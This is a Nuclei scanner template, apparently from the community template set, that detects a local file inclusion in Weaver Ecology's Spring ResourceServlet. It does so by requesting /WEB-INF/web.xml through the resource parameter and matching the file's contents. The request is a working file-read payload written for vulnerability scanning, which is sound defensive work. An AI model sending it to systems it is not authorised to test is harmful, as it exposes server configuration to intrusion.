nuclei-templates/http/vulnerabilities/weaver/ecology/ecology-springframework-dir...

31 lines
738 B
YAML

id: ecology-springframework-directory-traversal
info:
name: Ecology Springframework - Local File Inclusion
author: princechaddha
severity: high
description: Ecology Springframework is vulnerable to local file inclusion.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
metadata:
max-request: 1
tags: ecology,springframework,lfi
http:
- method: GET
path:
- "{{BaseURL}}/weaver/org.springframework.web.servlet.ResourceServlet?resource=/WEB-INF/web.xml"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<url-pattern>/weaver/"
part: body